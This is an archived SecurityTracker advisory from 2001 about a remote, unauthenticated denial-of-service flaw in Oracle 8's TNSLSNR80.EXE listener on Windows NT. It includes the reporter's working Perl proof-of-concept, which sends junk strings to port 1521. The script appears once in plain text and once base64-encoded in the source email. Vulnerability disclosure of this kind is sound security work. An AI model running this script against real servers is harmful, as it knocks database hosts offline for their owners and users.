SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Database)  >   Oracle Database Vendors:   Oracle
Oracle 8 Contains a Denial of Service Condition That Allows Remote Users to Cause the Server to Consume All Available CPU Resources
SecurityTracker Alert ID:  1001371
SecurityTracker URL:  http://securitytracker.com/id/1001371
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 19 2001
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   It is reported that Oracle 8 contains a vulnerability that allows a remote user to cause the application to consume all CPU resources.

It is reported that the Oracle program TNSLSNR80.EXE can be made to consume all available CPU resources to the point that the host becomes unusable. This has reportedly been tested Oracle 8 servers running Windows NT 4.0 (SP6). The remote user is not required to authenticate to the server to be able to trigger the vulnerability.

The author of the report has submitted the following perl script as a demonstration exploit:

----------------------------------------
#!/usr/local/bin/perl -w

# This little script crashes Oracle 8.0 on Windows NT 4.0 (Sp6)
# TNSLSNR80.EXE will consume 100% CPU...
#
# by r0ot@runbox.com

use IO::Socket;

$host="kickme";
# enter the hostname of the oracle-server to kick

socket(HANDLE, PF_INET, SOCK_STREAM, 6);
connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
HANDLE->autoflush(1);

sleep(2);
print HANDLE "\n";
for ($i=0; $i<3; $i++) {
sleep(2);
print HANDLE "dfsdffdfsfdggfdgdf";
# an arbitrary, but carefully chosen constant...
}

close(HANDLE);

Impact:   A remote user can cause the server to consume all available CPU resources.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.oracle.com/ (Links to External Site)
Cause:   Resource error
Underlying OS:   Windows (NT)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(A User Reports Solaris is Vulnerable Too) Re: Oracle 8 Contains a Denial of Service Condition That Allows Remote Users to Cause the Server to Consume All Available CPU Resources   (Stephen Oberther <oberther@CS.FSU.EDU>)
A user reports that Oracle 8 running on Solaris 8 is also vulnerable.
(A User Provides Additional Information) Re: Oracle 8 Contains a Denial of Service Condition That Allows Remote Users to Cause the Server to Consume All Available CPU Resources   ("James W. Abendschan" <jwa@JAMMED.COM>)
A user adds some details about vulnerabilities that have been fixed and those that remain.
(Extensive Vulnerability Analysis and Summary) Re: Oracle 8 Contains a Denial of Service Condition That Allows Remote Users to Cause the Server to Consume All Available CPU Resources   ("James W. Abendschan" <jwa@JAMMED.COM>)
A user provides a summary of various Oracle vulnerabilities.


 Source Message Contents
Date:  Wed, 18 Apr 2001 23:16:20 GMT
Subject:  Oracle8 denial of service


This is a multi-part message in MIME format...

------------=_987635780-27037-0
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: 8bit            

Hi!
Attached is a little perl-script, which makes TNSLSNR80.EXE consume all
available cpu-time so the computer becomes unusable. It works on
Oracle 8 servers running Windows NT 4.0 (SP6) and does not require any
authentication credentials to succeed. I have not tried it on any other versions
or platforms.

In case this is a known problem -> sorry. A quick search didn't turn
up anything...

cu
r0ot





-----------------------------------------------
Runbox Mail Manager - www.runbox.com
Free online email application
------------=_987635780-27037-0
Content-Type: application/x-perl; name="kick_orcl.pl"
Content-Disposition: inline; filename="kick_orcl.pl"
Content-Transfer-Encoding: base64

IyEvdXNyL2xvY2FsL2Jpbi9wZXJsIC13DQoNCiMgVGhpcyBsaXR0bGUgc2Ny
aXB0IGNyYXNoZXMgT3JhY2xlIDguMCBvbiBXaW5kb3dzIE5UIDQuMCAoU3A2
KQ0KIyBUTlNMU05SODAuRVhFIHdpbGwgY29uc3VtZSAxMDAlIENQVS4uLg0K
Iw0KIyBieSByMG90QHJ1bmJveC5jb20NCg0KdXNlIElPOjpTb2NrZXQ7DQoN
CiRob3N0PSJraWNrbWUiOw0KIyBlbnRlciB0aGUgaG9zdG5hbWUgb2YgdGhl
IG9yYWNsZS1zZXJ2ZXIgdG8ga2ljaw0KDQpzb2NrZXQoSEFORExFLCBQRl9J
TkVULCBTT0NLX1NUUkVBTSwgNik7DQpjb25uZWN0KEhBTkRMRSwgc29ja2Fk
ZHJfaW4oMTUyMSwgc2NhbGFyIGdldGhvc3RieW5hbWUoJGhvc3QpKSk7DQpI
QU5ETEUtPmF1dG9mbHVzaCgxKTsNCg0Kc2xlZXAoMik7DQpwcmludCBIQU5E
TEUgIlxuIjsNCmZvciAoJGk9MDsgJGk8MzsgJGkrKykgew0KICAgICAgICBz
bGVlcCgyKTsNCiAgICAgICAgcHJpbnQgSEFORExFICJkZnNkZmZkZnNmZGdn
ZmRnZGYiOw0KICAgICAgICAjIGFuIGFyYml0cmFyeSwgYnV0IGNhcmVmdWxs
eSBjaG9zZW4gY29uc3RhbnQuLi4NCn0NCg0KY2xvc2UoSEFORExFKTsNCg==

------------=_987635780-27037-0--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC